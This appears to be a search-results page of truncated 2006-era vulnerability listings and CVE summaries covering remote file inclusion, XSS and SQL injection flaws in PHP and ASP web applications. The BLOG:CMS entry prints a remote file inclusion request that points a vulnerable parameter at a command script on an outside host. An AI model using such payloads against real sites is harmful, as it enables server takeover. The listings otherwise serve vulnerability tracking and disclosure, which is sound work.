6697 matches found
mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability
Exploit for unknown platform in category web applications =========================================================== mxBB Module WebLinks = 2.05 Remote Inclusion Vulnerability =========================================================== Title : mxBB Module WebLinks = 2.05mxrootpath Remote File...
CVE-2006-6518
Multiple cross-site scripting XSS vulnerabilities in ProNews 1.5 allow remote attackers to inject arbitrary web script or HTML via the 1 pseudo, 2 email, 3 date, 4 sujet, 5 message, 6 site, and 7 lien parameters to a admin/change.php, and the 8 aa parameter to b lire-avis.php...
CVE-2006-6518
CVE-2006-6518 affects ProNews 1.5 and involves multiple reflected cross-site scripting (XSS) flaws. The vulnerability is triggered by unsanitized user-controllable input in several parameters: (1) pseudo, (2) email, (3) date, (4) sujet, (5) message, (6) site, and (7) lien to admin/change.php, and...
BLOG:CMS Remote file include Vulnerability
Hello BLOG:CMS Remote file include Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] admin/PLUGINs/NPUserSharing.php?DIRADMIN=http://www.soqor.net/tools/cmd.txt?admin WwW.SoQoR.NeT...
Apple Mac OS X 2006-007更新修复多个安全漏洞
Mac OS X是苹果家族计算机所使用的操作系统。 Apple 2006-007安全更新修复了Mac OS X中的多个安全漏洞,具体包括: CVE-2006-4396 Apple Type Services服务程序不安全地创建了错误日志文件,允许本地攻击者以系统权限覆盖或创建文件。 CVE-2006-4398 Apple Type Services服务程序中存在多个缓冲区溢出漏洞。本地攻击者可以通过发送特制的服务请求触发这些溢出,导致拒绝服务或以系统权限执行任意指令。 CVE-2006-4400 Apple Type...
CVE-2006-6256
Cross-site scripting XSS vulnerability in the file manager in admin/bromain.php in AlternC 0.9.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a folder name...
CuteNews aj-fork 167f - 'cutepath' Remote File Inclusion
=========================================================================================================== DeltasecurityTEAM www.Deltasecurity.ir =========================================================================================================== Portal Name : cutenews aj-fork Class =...
CVE-2006-6232
CVE-2006-6232 describes a PHP remote file inclusion vulnerability in DreamAccount 3.1, affecting admin/index.php via a URL in the path parameter. The underlying issue is a RFI in the path handling, allowing an attacker to execute arbitrary PHP code on the server. Documented impact is partial conf...
CVE-2006-6191
CVE-2006-6191 affects 8pixel.net SimpleBlog prior to or including version 2.3. The vulnerability is an SQL injection in admin/edit.asp via the id parameter, allowing remote attackers to execute arbitrary SQL commands. The NVD entry corroborates a possible high-severity impact with base score 7.5 ...
Hacks List phpBB Mod 1.21 - SQL Injection
Admin Hacks List v1.20 Remote SQL Injection Vulnerability Download: http://www.nivisec.com Found By: the master exploit:...
Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications =============================================================== Hacks List phpBB Mod = 1.21 Remote SQL Injection Vulnerability =============================================================== Admin Hacks List v1.20 Remote SQL Injection...
BirdBlog => v1.4.0 Cross Site Scripting
""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ DigitaL Hacking TeaM BirdBlog...
Pearl Forums 2.4 - Multiple Remote File Inclusions
Pearl Forums 2.4 - Multiple Remote File Inclusions | \ | / | \ \ / | | | | | \ / | \ \ / / | | | | '| | |/| |/ \ / / \ / / | | '| | | / | | || | | | | | | | | \ / | | | | || \ \ |/|| || ||,//\ / ||| ,|/...
Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities
No description provided by source. | \ | / | \ \ / | | | | | \ / | \ \ / / | | | | '| | |/| |/ \ / / \ / / | | '| | | / | | || | | | | | | | | \ / | | | | || \ \ |/|| || ||,//\ / ||| ,|/...
CVE-2006-5984
Multiple cross-site scripting XSS vulnerabilities in Helm Web Hosting Control Panel 3.2.10 allow remote authenticated users to inject arbitrary web script or HTML via the 1 txtCompanyName, 2 txtEmail, or 3 txtUserAccNum parameter to a users.asp, or the 4 setThemeColour parameter to b default.asp ...
CVE-2006-5984
Multiple cross-site scripting XSS vulnerabilities in Helm Web Hosting Control Panel 3.2.10 allow remote authenticated users to inject arbitrary web script or HTML via the 1 txtCompanyName, 2 txtEmail, or 3 txtUserAccNum parameter to a users.asp, or the 4 setThemeColour parameter to b default.asp ...
CVE-2006-5986
admin/options.php in Extreme CMS 0.9, and possibly earlier, does not require authentication, which might allow remote attackers to conduct unauthorized activities. NOTE: this issue can be combined with another vulnerability to expand the scope of a cross-site scripting XSS attack without...
CVE-2006-5984
Helm Web Hosting Control Panel 3.2.10 is affected by CVE-2006-5984: multiple XSS weaknesses in the Admin, Reseller, and User levels. The vectors include user input in (1) txtCompanyName, (2) txtEmail, (3) txtUserAccNum to users.asp; (4) setThemeColour to default.asp (Reseller/Admin) and (5) setTh...
FreeBSD : bugzilla -- multiple vulnerabilities (6d68618a-7199-11db-a2ad-000c6ec775d9)
A Bugzilla Security Advisory reports : - Sometimes the information put into the and tags in Bugzilla was not properly escaped, leading to a possible XSS vulnerability. - Bugzilla administrators were allowed to put raw, unfiltered HTML into many fields in Bugzilla, leading to a possible XSS...
eggblog=> 3.1.0 Cross Site Scripting
""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ DigitaL Hacking TeaM eggblog=...